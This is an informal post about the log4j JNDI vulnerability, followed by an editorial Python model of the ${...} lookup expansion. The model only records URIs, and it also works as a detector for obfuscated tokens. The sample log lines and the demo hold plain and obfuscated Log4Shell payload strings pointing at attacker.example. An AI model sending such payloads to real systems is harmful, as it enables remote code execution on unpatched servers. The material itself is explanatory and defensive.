It's almost Friday ...

Many of you might have read the blazing headlines everywhere that the whole
Internet is about to crash because of a security vulnerability in log4j. I
haven't written Java since early 2001, so I went looking for tech details.

It turns out someone wrote an appender (in our log4net terms) that parsed a
Uri out of a special bit of syntax, then blindly loaded and ran what was at
the Uri. I mean, what could possibly go wrong? I think that this guilty
JNDI appender is available by default, that is, it's in the JAR or
something like that (I can't get further fine details on that).

So it's a bit like *Aircrash Investigations*, where it takes multiple things
to go wrong to make a bigger wrong.

Who could have imagined that a logging library would bring the Internet
down?!

*Greg*

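An added worked example of the mechanism Greg describes (this is editorial
code, not Greg's and not log4j's own implementation): a small string
substitutor that expands `${...}` lookup tokens inside-out over a formatted
log line. The weak point is that the attacker-controlled part of the line (a
User-Agent header here) is expanded too, so a `jndi:` token carrying a URI is
parsed and acted on. The real library would load and run what it found at the
URI; this model only records the URI it would have fetched, so nothing is
contacted. The same substitutor with remote lookups disabled doubles as a
detector over raw log lines, because it normalises the `${lower:..}`,
`${upper:..}` and `${::-x}` default-value tricks used to hide the token. The
log lines, the `LookupResolver` class and the host `attacker.example` are all
constructed for the example.

```python
"""Constructed model of the ${...} lookup step in a logging library.

Editorial example, not log4j code. The vulnerable policy records the URI a
jndi: token names instead of loading anything from it.
"""
import re
from urllib.parse import urlsplit

# One lookup token with no nested braces in its body. Nested tokens such as
# ${${lower:J}ndi:...} are handled by resolving inside-out until none is left.
LOOKUP = re.compile(r"\$\{([^${}]*)\}")
MAX_EXPANSIONS = 32  # guard against runaway or self-referential expansion
JNDI_MARKER = "${jndi:"


class LookupResolver:
    """Expands lookup tokens; remote (jndi:) lookups are a policy switch."""

    def __init__(self, remote_lookups_enabled):
        self.remote_lookups_enabled = remote_lookups_enabled
        # (scheme, host, port, path) tuples the vulnerable policy would fetch
        self.remote_requests = []

    def resolve_one(self, key):
        """Resolve one token body; None means unknown, token stays literal."""
        if ":-" in key:  # ${name:-default}: default when name is unknown
            name, default = key.split(":-", 1)
            resolved = self.resolve_one(name)
            return default if resolved is None else resolved
        name, _, arg = key.partition(":")
        name = name.lower()  # lookup names are matched case-insensitively
        if name == "lower":
            return arg.lower()
        if name == "upper":
            return arg.upper()
        if name == "jndi":
            if not self.remote_lookups_enabled:
                return None  # hardened: the token is just text in the log
            parts = urlsplit(arg)  # e.g. ldap://attacker.example:1389/a
            self.remote_requests.append(
                (parts.scheme, parts.hostname, parts.port, parts.path))
            # Stand-in for "load and run whatever is at the URI".
            return "<object loaded from %s>" % arg
        return None

    def expand(self, text):
        """Expand tokens inside-out; unknown tokens are left as literal text."""
        expansions = 0
        pos = 0
        while expansions < MAX_EXPANSIONS:
            m = LOOKUP.search(text, pos)
            if m is None:
                return text
            replacement = self.resolve_one(m.group(1))
            if replacement is None:
                pos = m.end()  # keep scanning after the literal token
                continue
            text = text[:m.start()] + replacement + text[m.end():]
            expansions += 1
            pos = 0  # the replacement may have completed an enclosing token
        return text


def log_request(resolver, client_addr, user_agent):
    """Constructed access-log formatter. The template is fixed, but the
    User-Agent is attacker-controlled and still passes through expand()."""
    line = '%s - "GET / HTTP/1.1" UA="%s"' % (client_addr, user_agent)
    return resolver.expand(line)


def contains_jndi_lookup(raw_line):
    """Detection over a raw log line: normalise the harmless string lookups
    used for obfuscation (remote lookups stay off, so nothing is fetched),
    then look for the jndi token."""
    normalised = LookupResolver(remote_lookups_enabled=False).expand(raw_line)
    return JNDI_MARKER in normalised.lower()


# Constructed sample lines: benign, plain payload, obfuscated payload.
SAMPLE_LINES = [
    '10.0.0.5 - "GET / HTTP/1.1" UA="Mozilla/5.0 (X11; Linux x86_64)"',
    '10.0.0.9 - "GET / HTTP/1.1" UA="${jndi:ldap://attacker.example:1389/a}"',
    '10.0.0.9 - "GET / HTTP/1.1" '
    'UA="${${lower:J}${::-n}di:ldap://attacker.example:1389/a}"',
]

if __name__ == "__main__":
    payload = "${jndi:ldap://attacker.example:1389/a}"
    vulnerable = LookupResolver(remote_lookups_enabled=True)
    print(log_request(vulnerable, "10.0.0.9", payload))
    print("would have fetched:", vulnerable.remote_requests)
    hardened = LookupResolver(remote_lookups_enabled=False)
    print(log_request(hardened, "10.0.0.9", payload))
    for line in SAMPLE_LINES:
        print(contains_jndi_lookup(line), line)
```

The detector deliberately reuses the substitutor rather than a bare regex for
`${jndi:`, because the obfuscated third sample line never contains that
string until the inner lookups are expanded; grepping raw lines for the
literal token misses it.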